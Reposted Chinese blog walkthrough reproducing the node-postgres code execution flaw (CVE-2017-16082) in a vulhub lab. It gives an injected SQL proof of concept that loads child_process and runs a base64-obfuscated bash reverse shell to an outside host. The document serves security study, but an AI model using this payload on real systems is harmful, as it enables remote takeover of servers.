我是靠谱客的博主 俏皮小刺猬,最近开发中收集的这篇文章主要介绍node-postgres 代码执行漏洞(CVE-2017-16082),觉得挺不错的,现在分享给大家,希望可以做个参考。

概述

漏洞原理

请参考这篇文章:https://www.leavesongs.com/PENETRATION/node-postgres-code-execution-vulnerability.html

漏洞复现

我这里用的是vulhub的环境,启动环境后,访问http://your-ip:3000/?id=1即可查看到id为1的用户信息,当然id这里存在注入点,我们利用poc来RCE。比如我想执行命令echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjMwLjEyOC85OSAwPiYx|base64 -d|bash,则需要适当分割该字符串,每段不超过64字符,然后替换一下POC:

SELECT 1 AS "']=0;require=process.mainModule.constructor._load;/*", 2 AS "*/p=require(`child_process`);/*", 3 AS "*/p.exec(`echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIu`+/*", 4 AS "*/`MTY4LjMwLjEyOC85OSAwPiYx|base64 -d|bash`)//"

然后将其url编码并发送即可执行命令。

最后

以上就是俏皮小刺猬为你收集整理的node-postgres 代码执行漏洞(CVE-2017-16082)的全部内容,希望文章能够帮你解决node-postgres 代码执行漏洞(CVE-2017-16082)所遇到的程序开发问题。

如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。

本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
点赞(51)

评论列表共有 0 条评论

立即
投稿
返回
顶部